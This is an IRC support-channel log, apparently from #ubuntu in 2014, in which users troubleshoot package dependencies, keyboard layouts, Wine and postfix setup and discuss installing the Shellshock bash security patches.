[00:01] <sachina_> I tried to add a line to the control file for the overlay-scrollbar package "Multi-Arch: allow", but I get an error when using dpkg-deb -b: "'allow' is not allowed for foreign/allowed/same/no in quadstate field"
[00:01] <sachina_> This bug report I think is talking about my same problem: 'allow' is not allowed for foreign/allowed/same/no in quadstate field
[00:01] <sachina_> Oh, wrong paste, sorry: https://bugs.launchpad.net/ubuntu/+source/overlay-scrollbar/+bug/1262022
[00:01] <EriC^^> sachina_: i think DF is compiled for 32bit systems and it can't use 64bit libraries
[00:02] <sachina_> Yes, DF is 32 bit only
[00:02] <sachina_> I have all the 64 bit libs installed
[00:02] <sachina_> but I can support concurrent install of the 32 but libs
[00:02] <sachina_> and most of the 32 libs installed just fine
[00:02] <sachina_> it's just these last few ones
[00:02] <sachina_> that are having the trouble described in that bug report
[00:03] <EriC^^> sachina_: did you install ia32-libs ?
[00:04] <sachina_> EriC^^: as far as I can tell, ia32-libs is no longer supported on Trusty
[00:04] <sachina_> But I did install some other libs that were suggested instead, on the advice of someone here, earlier
[00:04] <sachina_> It didn't seem to fix this problem, but it probably helped for the future
[00:05] <EriC^^> sachina_: oh ok
[00:05] <BTJustice> My motherboard died so I had to replace it with a different model.  My keyboard and mouse are extremely slow now.  How can I refresh the drivers in Ubuntu?  Is there some way to scan for hardware changes, remove hardware no longer needed, and install hardware that is needed or has changed?
[00:05] <sachina_> I may just need to learn about how to use control files for debian packages, at this point, if this approach is viable
[00:07] <EriC^^> sachina_: you probably already saw this but http://www.bay12forums.com/smf/index.php?topic=98980.0
[00:11] <sachina_> EriC^^: thank you, yes, it helped me solve the problem I was having at first when sound didn't work
[00:11] <sachina_> EriC^^: But it doesn't seem to have help about this problem with overlay-scrollbar, unless I missed something
[00:14] <BTJustice> My motherboard died so I had to replace it with a different model.  My keyboard and mouse are extremely slow now.  How can I refresh the drivers in Ubuntu?  Is there some way to scan for hardware changes, remove hardware no longer needed, and install hardware that is needed or has changed?
[00:15] <Artemis3v> BTJustice, you normally do nothing of the sort, in fact its normal to take your hd and put it elsewhere and just work
[00:16] <Eremo> scrollback command not found also... did i broke the distro?
[00:16] <Artemis3v> BTJustice, it might be interesting to check bios settings
[00:16] <BTJustice> Yeah Iii   aaammm ouutt f iiddes.
[00:17] <BTJustice> Yeah I am out of ideas.
[00:20] <sachina_> Oh, hah, I didn't read my own error message for dpkg-deb.  "'allow' is not allowed for foreign/allowed/same/no in quadstate field"  I needed to use "allowed" keyword, not "allow"
[00:20] <sachina_> rebuilding the package works now at least
[00:22] <Paquito> hello
[00:23] <daftykins> hi
[00:23] <pdayton> Is there a bash update for 11.04?
[00:23] <daftykins> !11.04
[00:23] <daftykins> that distro is almost 2 years dead.
[00:24] <daftykins> s/distro/release/
[00:24] <daftykins> pdayton: it will not get updated
[00:25] <Eremo> Do anyone know's why my Trusty LTS won't recognize the setxkbmap command? sudo: setxkbmap: command not found
[00:25] <daftykins> wow you're still on that
[00:25] <daftykins> maybe that command is deprecated
[00:25] <Eremo> yeah and googling it still..
[00:25] <Eremo> nonstop
[00:25] <Eremo> mmm the thing is
[00:25] <Eremo> i used it 3 hours ago
[00:25] <Eremo> in same distro..
[00:26] <daftykins> same distro, but version?
[00:26] <Eremo> also try keyboard-configuration , reconfigure it
[00:26] <Eremo> should be same version, i havent updated or downgraded
[00:26] <EriC^^> !find setxkbmap
[00:26] <Eremo> or maybe apt-get install -f did
[00:26] <daftykins> so your other install was 14.04 too?
[00:27] <daftykins> i vote the middle one
[00:27] <daftykins> :>
[00:27] <Eremo> doesnt exist
[00:27] <EriC^^> Eremo: try to sudo apt-get install x11-xkb-utils
[00:27] <EriC^^> !info x11-xkb-utils
[00:27] <kandinski> where should I look for updates on the fix for CVE-2014-7169 (the second bash vulnerability after the first one was patched)?
[00:27] <Eremo> yes, according to the ISO , its 14.04, has been all the time
[00:28] <haza-w> kandinski: by "updates", do you mean news, or updated software?
[00:28] <EriC^^> Eremo: it should be in the repos
[00:28] <kandinski> haza-w: I meant news. Patch is not yet on repos for 12.04
[00:29] <kandinski> let me see which mirror I'm using...
[00:29] <Eremo> you mean, by default, it should find the command, right?
[00:29] <kandinski> ah, could rackspace mirrors be out of date?
[00:29] <EriC^^> Eremo: no i mean the x11-... shoud be there
[00:29] <EriC^^> Eremo: but yes, i have the command too, by default
[00:29] <kandinski> GNU bash, version 4.2.25(1)-release
[00:29] <Eremo> installing package
[00:29] <Eremo> somehow it disspeared O.o
[00:29] <EriC^^> Eremo: did you install via minimalcd or something?
[00:29] <Eremo> vmware
[00:30] <haza-w> kandinski, a security update was released to precise-security an hour ago
[00:30] <Eremo> iso image mounted in windows
[00:30] <Pyro_Killer> minimalist Ubuntu is only Ubuntu
[00:30] <haza-w> that should have patched the vulnerability
[00:30] <kandinski> haza-w: thanks
[00:30] <haza-w> 4.2-2ubuntu2.3
[00:30] <Eremo> why eric?
[00:30] <haza-w> np :)
[00:30] <EriC^^> Eremo: caues you get to choose what packages to install in the minimalcd, thought maybe it was cause of that
[00:31] <Eremo> but i promise you
[00:31] <Eremo> i used it earlier
[00:31] <kandinski> 4.2-2ubuntu2 here
[00:31] <Eremo> i dont know why it dissapear
[00:31] <Pyro_Killer> so I installed Ubuntu minimalist and added xubuntu to the tasksel screen, however when I press upwards in the terminal it doesn't display the previous command, I have never had this issue before...
[00:31] <Eremo> anyway, no i downloaded the ISO without any options
[00:32] <kandinski> haza-w, my laptop is on saucy, and no update yet either. I'll just check every half hour.
[00:32] <Eremo> EriC^^ i think it worked, now it recognizes command and i read: Cannot open display "default display"
[00:33] <EriC^^> Eremo: this is a gui?
[00:33] <Peng> kandinski: saucy isn't supported anymore...
[00:33] <EriC^^> or server ubuntu
[00:33] <Sleepnbum> welp, don't try clicking "something else" and "continue" before the screen finishes loading when installing ubuntu
[00:33] <Sleepnbum> totally fucked my drive
[00:33] <daftykins> only LTS releases are getting patched right now
[00:33] <daftykins> 10.04, 12.04, 14.04
[00:33] <Sleepnbum> it went with the default and didn't listen to my "something else" preference
[00:33] <Eremo> EriC^^ server ubuntu
[00:34] <haza-w> kandinski: saucy is end-of-life as of July, no more package updates
[00:34] <kandinski> haza-w: ok, time to move to trusty
[00:35] <EriC^^> Eremo: i think it needs to be run from an Xsession
[00:35] <Eremo> its very weird
[00:35] <Eremo> i used this same command few hours ago
[00:35] <Eremo> and it worked out
[00:35] <haza-w> there's definitely an update in precise-security, you can install it yourself if you want: https://launchpad.net/ubuntu/precise/+package/bash
[00:35] <Eremo> i had even the ñ key
[00:35] <haza-w> ^ kandinski
[00:36] <EriC^^> Eremo: try to run the command not as root
[00:36] <Eremo> syntas was sudo setxkbmap -layout 'es,es' -model pc105
[00:36] <Eremo> syntax
[00:36] <Eremo> ok
[00:37] <Eremo> same message
[00:37] <sachina_> Alright, I guess if Dwarf Fortress works that's good enough for me.  None of the stuff I've tried to resolve those probably minor errors has worked.  Thanks for all your help ,ubuntu channel.
[00:38] <Eremo> mmm i manually editted before /etc/default/keyboard before, trying to fix keyboard... could has something to do?
[00:38] <EriC^^> Eremo: don't think so
[00:39] <Eremo> EriC i think i could fix this, without using that command
[00:39] <EriC^^> Eremo: theres loadkeys
[00:39] <Eremo> the only thing i need to fix its the ñ key and the áéíóú keys
[00:40] <EriC^^> Eremo: try sudo apt-get install console-data
[00:40] <Eremo> ´
[00:40] <Eremo> oki
[00:40] <Eremo> unable to locate package
[00:40] <EriC^^> !info console-data
[00:41] <EriC^^> Eremo: add universe to your repos
[00:41] <Eremo> optional
[00:41] <Eremo> oki
[00:41] <Eremo> ill tell u when done
[00:44] <Eremo> looks like theyre already added , that lines
[00:44] <Eremo> deb http://us.archive.ubuntu.com/ubuntu trusty universe
[00:45] <shumacca0001> Anyone patched there ubuntu servers for shellshock yet?
[00:49] <EriC^^> Eremo: never used it before
[00:49] <EriC^^> ( console-data )
[00:49] <EriC^^> maybe someone would chime in on the interface setup of it
[00:50] <tafa2> shumacca0001 yeah
[00:53] <Eremo> ok so console-data its installed now
[00:54] <EriC^^> Eremo: now you need to use loadkeys
[00:54] <EriC^^> go to /usr/share/keymaps , and check that what you want is there
[00:55] <matthoiland> shumacca0001: Not sure if there's a working shellshock patch yet
[00:56] <samthewildone> is the audio.conf created by default if I remove it ?
[00:57] <Eremo> rebooting, lets see if its finally ok
[00:57] <Eremo> i did sudo loadkeys es
[00:57] <Guest40907> Can I install global menu in ubuntu mate?
[00:57] <shumacca0001> clear
[00:57] <EriC^^> Eremo: did it work after the command?
[00:58] <Eremo> almost
[00:58] <Eremo> something has changed but
[00:58] <Eremo> ñ gives me ;
[00:58] <Eremo> and all signs are different
[00:59] <Eremo> i think i have english xDD
[00:59] <EriC^^> Eremo: i think you have to specify the map, like sudo loadkeys /usr/share/keymaps/.......es.kmap.gz
[00:59] <Eremo> no, it actually reports it
[00:59] <Eremo> and its ok
[01:00] <Eremo> it found the file and report it: es.kmap.gz
[01:00] <EriC^^> try find /usr/share/keymaps -iname "es.kmap.gz"
[01:00] <EriC^^> oh ok
[01:00] <EriC^^> maybe there's more than 1?
[01:00] <Eremo> ill check about that
[01:02] <shumacca0001> exit
[01:04] <Eremo> yeah there was 2 of them, none its the good one...
[01:06] <Daekdroom> Is there any way to figure out which codec is Ubuntu using for the A2DP profile for Bluetooth?
[01:06] <LuchaLibre> Hi! I'm trying to run an executable file in Linux, I did the chmod  but when i execute it, nothing happens. Help?
[01:07]  * YoukuntYou would love to have his systray back
[01:08] <EriC^^> LuchaLibre: what are you trying to execute?
[01:09] <LuchaLibre> EriC^^: YGOPro's Linux build
[01:10] <EriC^^> ok what do the installation instructions say?
[01:10] <LuchaLibre> Run the executable.
[01:10] <EriC^^> nothing else before that?
[01:10] <LuchaLibre> Nein.
[01:10] <haza-w> do you get any output whatsoever when you run the command?
[01:10] <EriC^^> ok so in a terminal what are you typing to execute it?
[01:11] <LuchaLibre> Haza, no I didn't
[01:11] <LuchaLibre> I marked it as executable and I clicked run in terminal
[01:11] <LuchaLibre> nothing happened
[01:12] <LuchaLibre> i also clicked run
[01:12] <EriC^^> LuchaLibre: open a terminal, cd to the directory, and type ./<executable name>
[01:12] <somsip> LuchaLibre: have you followed the steps in the last comment here? http://www.reddit.com/r/yugioh/comments/2bngxb/does_anybody_know_how_to_make_devproygopro_work/
[01:13] <LuchaLibre> EriC^^: It says "bash: ./: Is a directory
[01:13] <LuchaLibre> "
[01:14] <EriC^^> LuchaLibre: you are in the directory of the executable?
[01:14] <userRR> hi guys I have a hp dvr spy watch which can take photo / video -- how can I get the photos / videos to show up on linux since the driver is for windows 7?
[01:14] <LuchaLibre> EriC^^: Yes
[01:14] <EriC^^> what exactly are you typing?
[01:16] <LuchaLibre> EriC^^: http://paste.ubuntu.com/8429419/
[01:16] <adam_> hi
[01:16] <EriC^^> LuchaLibre: mind the space between ./ and y...
[01:16] <userRR> it's basically a urb drive, I mean it charges but how do I get it to show up as a drive?
[01:16] <adam_> anyboy tell me how to install wine and run it on my computer?
[01:17] <userRR> if you are using ubuntu use the software centre, search for WINE
[01:17] <LuchaLibre> ah tried again it says I'm missing a lib
[01:17] <userRR> adam_: then insall wine tricks, it will help you get things working in wine.
[01:17] <EriC^^> LuchaLibre: which lib?
[01:17] <somsip> LuchaLibre: as it says in that link I posted...
[01:17] <adam_> im using Xubuntu
[01:17] <LuchaLibre> libevent_pthreads-2.0.so.5 this one
[01:18] <delinquentme> ok so I just compiled a file ... now IM tyrying to sort out where I compiled it to
[01:18] <LuchaLibre> somsip: Sorry I didn't notice somehow. XD
[01:18] <delinquentme> advice?  ... I didn't pass it any additional flags
[01:18] <EriC^^> !find libevent_pthreads-2.0
[01:18] <trism> delinquentme: a.out maybe?
[01:18] <delinquentme> trism, this is a command I run?
[01:19] <adam_> im using Xubuntu 14 and was wandering how to load up wine after i installed it.
[01:19] <trism> delinquentme: it would be a file in the current directory, so: ./a.out; could check ls first of course
[01:19] <LuchaLibre> EriC^^: I'm installing the missing lib now.
[01:19] <EriC^^> LuchaLibre: ok
[01:20] <LuchaLibre> EriC^^: Houston we have lift off.
[01:20] <EriC^^> hehe, great :)
[01:20] <LuchaLibre> Thanks :D
[01:21] <EriC^^> no problem :D
[01:21] <adam_> how do i run WINE after i downloaded it on Xubuntu
[01:21] <LuchaLibre> This channel is better than proprietary support :D
[01:21] <LuchaLibre> adam_: Right click the .exe you want to run and select wine program loader
[01:22] <yuriks> Hi. I'm installing Ubuntu Server 14.04.1 LTS after having done many 14.04 installs in the past. It seems like the installer was changed in this version: the Software Selection menu at the very end of the install has many more options now
[01:22] <yuriks> what does "Basic Ubuntu Server" mean in that menu?
[01:22] <LuchaLibre> Take care, folks.
[01:24] <userRR> hi guys -- I have a hp drv spy watch and I can charge it, but I can't see a usb drive (and the driver is for windows 7). But I'm sure it must work. Anything I can do to check or make it show up?
[01:24] <adam_> LuchaLibre when it installed it just put a file folder on the desktop that says WINE 1.6.2. It has lots of files in it but i dont see one that will run wine
[01:24] <Eremo> why isnt this working? sudo apt-get install build-esential |& tee logt.txt   // after this, logt.txt its clear...
[01:24] <Eremo> adam_ luchalibre left
[01:24] <Blue1> I am having difficulty getting this nic to work:  02:03.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8100/8101L/8139 PCI Fast Ethernet Adapter (rev 10)
[01:24] <EriC^^> Eremo: you're missing an s on build-essential
[01:25] <EriC^^> ( if you pasted what you used )
[01:25] <samthewildone> If my audio.conf file from /etc/bluetooth/ is removed will a new one come up ?
[01:25] <Eremo> mmm if i use essentialS there is a problem locating the package
[01:25] <adam_> Eremo do you know how i can get WINE running after i downlaod it?
[01:25] <Eremo> but if i use essential i have corrupt package... humm dont know what to choose :D
[01:26] <EriC^^> Eremo: no i mean you have it as build-esential
[01:26] <Eremo> yeah but look
[01:26] <Eremo> if i apt-get install build-essentials
[01:26] <Eremo> untable to locate package
[01:26] <adam_> Eremo it just put a file folder on the desktop . i dont know which file in it runs it
[01:26] <EriC^^> Eremo: i think it's build-essential
[01:27] <Eremo> adam_ uhmmm there should be an exec to be placed in BIN
[01:27] <Eremo> cant tell you for sure, if it was unpackaged automatically, there should be a command to run it adam
[01:28] <EriC^^> Eremo: you could use sudo apt-get install build-essential &> logt.txt , instead btw
[01:28] <Eremo> yeah EriC^^ , but anyway cant install it
[01:28] <Eremo> oki
[01:29] <EriC^^> Eremo:  try to reinstall it
[01:29] <EriC^^> Eremo: sudo apt-get install --reinstall build-essential
[01:30] <Eremo> EriC^^ still bad
[01:30] <Eremo> ill paste the problem
[01:30] <EriC^^> Eremo: ok
[01:30] <Eremo> !paste
[01:30] <Eremo> http://paste.ubuntu.com/8429496/
[01:30] <Eremo> thats the result
[01:31] <Eremo> i try to install libc6-dev , and libc6, but cant
[01:31] <az6667> urm is this channel appropriate for asking questions/issues with usn-2363-1 (cve-2014-7169 fix)?
[01:32] <adam_> Eremo Im very new to Xubuntu and how do i place the .exe in BIN?
[01:34] <EriC^^> Eremo: maybe try sudo apt-get install -f
[01:34] <Eremo> mmm ubuntu directory i think its: /usr/bin
[01:34] <Eremo> but cant be sure
[01:34] <Eremo> ok eric
[01:34] <Eremo> nothing upgraded or moved
[01:35] <Blue1> I am having difficulty bringing up a 02:03.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8100/8101L/8139 PCI Fast Ethernet Adapter (rev 10) can someone help?
[01:35] <Blue1>  
[01:36] <EriC^^> Eremo: why can't you install libc6-dev ?
[01:36] <adam_> how do you put a exe into Bin
[01:37] <Eremo> exactly the same , but this time it points to libc6
[01:38] <Eremo> no sorry
[01:38] <Eremo> its not exact the same
[01:38] <Eremo> the message is
[01:38] <Guest39046> dicck
[01:38] <Guest39046> #noswag
[01:38] <Eremo> Depends: libc6 (= 2.19-0ubuntu6.3) but 2.19.-11 is to be  installed
[01:39] <Guest39046> listen
[01:39] <Guest39046> j
[01:39] <Guest39046> __________
[01:39] <Guest39046> s
[01:39] <az6667> usn-2363-1 is a fix for cve-2014-7169 but an ubuntu 14.04.1 LTS box is still vulnerable after installing bash 4.3.7ubuntu1.2
[01:40] <az6667> ubuntu 12.04.5 LTS is unaffected after installing it’s bash 4.2-2ubuntu2.3
[01:40] <Guest39046> there is like nobody here
[01:40] <pavlos> Blue1, do you have the nictools-pci installed?
[01:41] <haza-w> az6667: https://bugs.launchpad.net/ubuntu/+source/bash/+bug/1374207
[01:41] <Blue1> pavlos: no but I can install it
[01:41] <az6667> ah thanks bot
[01:41] <az6667> thanks haza
[01:41] <haza-w> np
[01:41] <Blue1> pavlos: installed
[01:42] <pavlos> Blue1, does lspci 'see' the card. What is the dmesg output
[01:42] <az6667> ah very good, ~1 hr from a fix. cheers
[01:43] <Blue1> pavlos: yes:  02:03.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8100/8101L/8139 PCI Fast Ethernet Adapter (rev 10)
[01:44] <pavlos> Blue1, then you need to play with ipconfig up/down and see if it picks up an ip. I have to leave for 2 hours, I hope someone else can help
[01:44] <haza-w> I was about to compile myself, but 197MB of unsatisfied dependencies on this shoddy internet connection...
[01:44] <haza-w> :-/
[01:45] <Blue1> pavlos: thank I'll re ask the question later
[01:46] <az6667> i had to compile the osx one from source. still waiting on the latest patch from gnu so i can roll that out too
[01:48] <Eremo> Hello , im having a problem installing build-esential packagen on ubuntu server 14.04. PASTE: http://paste.ubuntu.com/8429496/
[01:48] <tafa2> apt-get clean
[01:49] <tafa2> apt-get update
[01:49] <tafa2> apt-get install -f build-essential
[01:49] <Eremo> ok , ill tell u now
[01:50] <Eremo> same problem
[01:50] <EriC^^> Eremo: try autoremove
[01:50] <Eremo> that? autoremove?
[01:51] <Eremo> sounds bad
[01:51] <Eremo> xD
[01:51] <EriC^^> Eremo: no, sudo apt-get autoremove
[01:51] <Eremo> ok done
[01:51] <Eremo> 38 not upgraded
[01:51] <Eremo> 0 moved
[01:51] <Eremo> 0 upgraded
[01:53] <Eremo> still same issue
[01:54] <haza-w> what about if you try to install the dependencies manually?
[01:55] <haza-w> sudo apt-get install g++ libc6-dev
[01:55] <Eremo> lready try
[01:55] <Eremo> already
[01:55] <Eremo> give me 1 min. ill paste
[01:56] <Vivekananda_y510> hi ubuntu. is there a way that tcp wrappers can be disabled  not just deleting the rules ? I am curious
[01:59] <ndirikufunda> how can i creat /var/spool/mail/user
[01:59] <ndirikufunda>  just mkdir?
[01:59] <ndirikufunda> and what permissions should it have?
[01:59] <ndirikufunda> i wan't to use it with procmail
[02:00] <ndirikufunda> fetchmail, mutt, procmail, msmtp
[02:00] <ndirikufunda> ?
[02:01] <Eremo> again permision denied using &>
[02:01] <Eremo> this is starting to getting me mad
[02:01] <Eremo> to make the same thing i have to change the method 3 times?
[02:02] <Eremo> i just want to output on a text file!!!1
[02:02] <Eremo> ive tried |& tee document.txt and &> document.txt
[02:02] <Eremo> someone knows why i get permission denied, using sudo in the command?
[02:03] <trism> Eremo: what directory are you in?
[02:03] <Eremo> the same one
[02:03] <Eremo> mmm wait
[02:03] <trism> Eremo: I don't know what directory that is
[02:03] <Eremo> aahhh thats it
[02:03] <ndirikufunda> will procmail make my mailbox in the spool and set the correct permissions?
[02:03] <trism> Eremo: try putting it in /tmp/ or something
[02:03] <Eremo> its because of that
[02:03] <EriC^^> yeah, when you use pipes it a new command and sudo doesn't go there
[02:03] <Eremo> i was in /usr, sorry
[02:04] <ndirikufunda> anyone here know mutt well?
[02:04] <Eremo> i see
[02:04] <haza-w> Eremo: if you want to output to a file that requires privileges, you need
[02:04] <haza-w> command | sudo tee filename.out
[02:04] <haza-w> you can then &>/dev/null to get rid of stdout/stderr
[02:04] <ndirikufunda> im procmail's rc should * ^TOmutt-user be my username?
[02:05] <linwiz> what would the command be to generate the *SUM* files @ http://releases.ubuntu.com/12.04/
[02:05] <EriC^^> linwiz: on the iso you downloaded?
[02:06] <Eremo> if i try to install dependency manually : http://paste.ubuntu.com/8429648/
[02:06] <linwiz> Well I actually want to create *SUM* files just like the ones at that URL, but I want to do it on my own files
[02:07] <trism> Eremo: what is: apt-cache policy libc6;
[02:07] <EriC^^> linwiz: yeah i had a hunch that's what you wanted to do,
[02:07] <spearhead> linwiz, man md5sum
[02:07] <Eremo> intalled 2.9-11
[02:07] <EriC^^> spearhead: he/she wants to make a md5sum of his/her whole installation
[02:08] <Eremo> it looks like older version than what is required
[02:08] <linwiz> I didn't realize md5sum would do all of that, sorry.
[02:08] <trism> Eremo: no I want to see the repos
[02:08] <Eremo> ook
[02:08] <spearhead> linwiz, do you want to create a sum of every file on your system?
[02:08] <spearhead> or just specific ones?
[02:08] <linwiz> no, just in one directory
[02:09] <EriC^^> linwiz: what exactly are you trying to do?
[02:09] <Eremo> this is ->http://paste.ubuntu.com/8429657/
[02:09] <EriC^^> linwiz: nevermind
[02:09] <trism> linwiz: just pass the file names to md5sum: md5sum *.iso; or whatever, then you can pipe it to a file
[02:10] <linwiz> I'm sorry, I'm not trying to be difficult.
[02:10] <Eremo> thats the sources of the package?
[02:10] <EriC^^> linwiz: if you want a list of the md5sum of files in a directory you could do "find . -exec md5sum {} \;"
[02:10] <spearhead> linwiz, if you want to do each file individually then you can write a loop if you want all the files together... I'm not sure how to do that except to create a zip or tar file...
[02:11] <EriC^^> linwiz: or if there are no directories, only files, you could do "md5sum *"
[02:11] <EriC^^> linwiz: it's fine, i thought you meant something else, like you had a custom ubuntu installation and wanted to make md5sum like in the releases. website
[02:11] <trism> Eremo: yeah you have a libc6 installed from sid or something, you could try: sudo apt-get install libc6/trusty; to see if you can get back to the repo version. check that it doesn't try to remove anything
[02:12] <linwiz> The second part of that, yes. " wanted to make md5sum like"
[02:12] <linwiz>                 in the releases. website
[02:12] <trism> Eremo: you could also specify the version number, libc6=2.19-0ubuntu6.3 but it doesn't tend to be as smart if it has to downgrade other packages
[02:13] <EriC^^> linwiz: ok if the folder only has files which are not hidden, you can use "md5sum * > list"
[02:13] <Eremo> can i remove package and install older?
[02:13] <linwiz> I can see how to get the MD5SUMS file, but the rest, metalink pgp etc, not sure there
[02:14] <spearhead> linwiz, how many files are in the directory and do you want them all to be summed together or do you want to get the sum of each individual file?
[02:14] <Eremo> ill try first thing u said trism
[02:14] <trism> Eremo: no, libc6 is used by everything. at least not with apt. you could do it directly with dpkg, but I would try to get apt to do it first
[02:14] <linwiz> a few files, individual
[02:14] <Eremo> downloading trusty version
[02:15] <Eremo> hey it worked, now policy show previous version
[02:16] <trism> Eremo: excellent, hopefully build-essential will install now
[02:16] <Eremo> heeeey!! :D its installing it!
[02:16] <Eremo> trism can u help me in one more thing pleasE?
[02:17] <Eremo> lets see if we could fix this for once, my keyboard doesnt have the right config.. and we have tried a lot of ways
[02:18] <haza-w> https://bugs.launchpad.net/ubuntu/+source/bash/+bug/1374207
[02:18] <haza-w> Trusty has been patched
[02:18] <Eremo> by the way , build-essential got installed , thanks
[02:20] <haza-w> it's in trusty-security but not yet in trusty-updates
[02:22] <trism> Eremo: I don't really switch from the us config, so I'm not sure I'd be of much help if the text entry settings aren't doing it for you
[02:22] <seanz> Greetings. Is there a way to display what version a package will be upgraded to?
[02:23] <trism> seanz: apt-cache policy package-name
[02:24] <seanz> trism: Thanks!
[02:25] <Eremo> ok , i want to set up spanish settings, but cant
[02:27] <Vivekananda_y510> hi ubuntu. is there a way that tcp wrappers can be disabled  not just deleting the rules ? I am curious
[02:27] <trism> Eremo: did you add it in Text Entry? I had a problem once where I couldn't switch the layouts in the keyboard indicator because I had accidently disabled the gnome settings daemon keyboard plugin, don't know if that is your issue (I would select them but it wouldn't change)
[02:28] <Vivekananda_y510> can someone also tell me what is wrong with the command iptables -I INPUT -s 10.30.0.0/16 -p tcp -dport 22 -j ACCEPT
[02:28] <trism> Eremo: which can be enabled in dconf-editor org/gnome/settings-daemon/plugins/keyboard
[02:28] <Eremo> trism i dont have X , i have server distribution
[02:28] <spearhead> should be -A INPUT to add to the INPUT table
[02:29] <spearhead> Vivekananda_y510, ^
[02:29] <Eremo> command line only
[02:29] <Vivekananda_y510> okay
[02:29] <trism> Eremo: so you want to say the layout in the tty?
[02:29] <Eremo> ive been using loadkeys es , eriC^^ was trying to help me out, but we couldnt
[02:30] <Eremo> what is tty? :S
[02:30] <Vivekananda_y510> spearhead, it says Bad argument 22 to me
[02:30] <trism> Eremo: are you sitting at the computer typing, or are you connected through ssh or something?
[02:31] <Eremo> Im sitting in my computer, why do you ask?
[02:31] <spearhead> Vivekananda_y510, --dport 22
[02:31] <Eremo> at* my computer
[02:31] <spearhead> make sure you have 2 - in front of dport
[02:31] <Vivekananda_y510> oo okay sorry spearhead
[02:31] <spearhead> np
[02:32] <trism> Eremo: how about the answer here: http://askubuntu.com/questions/155424/changing-tty-keyboard-layout-on-a-server
[02:33] <trism> Eremo: possibly the second one
[02:34] <Eremo> didnt worked
[02:34] <Eremo> im rebooting
[02:34] <Eremo> just in case
[02:36] <Eremo> nope look, when i use that tool to reconfigure, its like a menu, where i have to choose what kind of keyboard i have and what language, it changes my config. but its not the right one
[02:36] <Eremo> when i press Ñ this key, it prompts somehow different with this prompt: (arg.1  )
[02:36] <Eremo> its weird.. so i have to press enter to go back to the regular prompt
[02:37] <Eremo> and thats supposed to be the spanish keymap
[02:37] <cortexman> svn: E000036: Can't move '/home/mingus/Projects/ccnlab_sims/.svn/tmp/svn-zTEQxA' to '/home/mingus/Projects/ccnlab_sims/perception/fg/wts/n_test=50-create_dataset=false-wt_scale_init=false-wts_subdir=wts-log_dir=log-adapt_rel=false-adapt_abs=false-n_train=500-lrate=.03-new=y.00_0250.wts.gz': File name too long
[02:37] <EriC^^> Eremo: odd, that's like pressing alt+1
[02:37] <cortexman> any ideas?
[02:37] <Eremo> yes, exactly
[02:37] <Eremo> same result
[02:39] <Eremo> also this doesnt work á ´ é
[02:40] <Eremo> the config that worked me once fine to me was
[02:40] <cortexman> the path plus file name is 205 characters long
[02:40] <cortexman> why is that a problem?
[02:40] <Eremo> setxkbmap -layout 'es,es' -model pc105 , but it wont work again that command
[02:41] <Eremo> it worked good once, when ubuntu installation was fresh, this morning
[02:41] <Eremo> but somehow distro has changed a lot since than a dissapointed me
[02:41] <Eremo> and frustrated me :3
[02:43] <Eremo> probably i dissapointed it too as root user xD
[02:45] <SchrodingersScat> cortexman: and the file name is only 153, yeah?
[02:45] <cortexman> i fixed it by making a short directory name in root and checking out there
[02:45] <cortexman> i think it's due to having an encrypted home drive. not sure why.
[02:51] <haza-w> Question: If we're about to hit utopic, what happens when we run out of alphabet?
[02:51] <haza-w> :-/
[02:51] <haza-w> although I guess there never was an A release
[02:52] <SchrodingersScat> AA Aardvark
[02:52] <haza-w> BB...
[03:02] <ninad> hi
[03:03] <ninad> I need someone to tell me how to mount lvm partition in ubuntu
[03:04] <SchrodingersScat> !lvm
[03:04] <nestle33> I ran apt-get update;apt-get upgrade because of this new bash security vulnerability. however since then ive re-ran apt-get update;apt-get upgrade and its once again asking to update bash. is this normal? this has happened like 3 times now.. on one of my systems i just went from 4.3-7ubuntu1.2 to 4.3-7ubuntu1.3 now
[03:04] <zzxc> Alright so I'm sure this is pop up all over the place. Is there a way to test for the shellshock bug?
[03:05] <SchrodingersScat> nestle33: I had at least two in two days
[03:05] <SchrodingersScat> !shellshock
[03:05] <nestle33> what version are you running for bash? like dpkg -l|grep bash
[03:06] <zzxc> Was it actually successfuly patched. I thought there was already a easy work around the patch.
[03:06] <nestle33> well thanks for confirming im not the only one having to keep updating bash. i was worried maybe my system was compromised
[03:08] <xangua> at least you are not one of those worried only about shellbash but using unsupported releases like 10.10, 13.04, 12.10, etc.
[03:08] <zzxc> nestle33: 4.2.2
[03:09] <zzxc> nestle33: Also I saw this earlier. Might be a good way for checking if you've had ingress
[03:09] <zzxc> http://draios.com/shellshock-sysdig/
[03:13] <ninad> @zzxc give link is really helpful , but newer versions of OS has good protection against heartbleed
[03:13] <ninad> *given
[03:18] <linguini> $ sudo apt-get install postfix # gives me a curses dialog.  If I click Cancel, it comes right back ?!
[03:19] <linguini> Is it possible to Cancel such a dialog?  Must I resort to kill?
[03:22] <bkjr> "Must I resort to kill?" -linguini
[03:24] <bkjr> linguini: why do you want to cancel it?
[03:24] <bkjr> if you don't want to configure it now, maybe select "no configuration"?
[03:26] <linguini> bkjr: I want to create a fully-repeatable installation script.
[03:26] <linguini> bkjr: Plus, the fact that I can't cancel it makes me want to cancel it very badly.  It's irritating for it to try to overrule me.
[03:27] <bkjr> ok, checkout apt-get's -c and -o flags
[03:27] <linguini> I didn't select "no configuration" because I thought that would install postfix.  Instead of installing it, I want to cancel, and see if there is some way to install it without the curses-based dialog.
[03:28] <bkjr> i think you can give it a config file
[03:29] <bkjr> or as parameter in -o's case
[03:29] <linguini> bkjr: Thanks.  How do I stop the curses dialog?  Cancel doesn't work...
[03:31] <bkjr> yeah, i'm just assuming if you give the options in the command the curses won't ask you things. i haven't tested it
[03:31] <linguini> No, I mean the current curses box -- it won't go away.  I can't even get a terminal prompt.
[03:32] <bkjr> choose on option and click ok
[03:32] <bkjr> i mean choose ok
[03:32] <bkjr> if you do "no configuration" it doesn't ask you anything anymore
[03:32] <linguini> bkjr: I see, so the "Cancel" is just an illusion of choice..
[03:33] <yzx> hello everyone.I want to show more file information in Basic properties page.So how can I do?
[03:33] <bkjr> i don't think it's deliberate, just broken
[03:35] <bkjr> yzx: what page are you talking about?
[03:35] <sgtsaughter> hey everyone, I'm having trouble with an ubuntu live cd i get a black screen when i select either install or try ubuntu...it goes to a black screen with a blinking white cursor and then eventually just freezes
[03:36] <bkjr> yzx, please use this channel
[03:36] <bkjr> what information do you need?
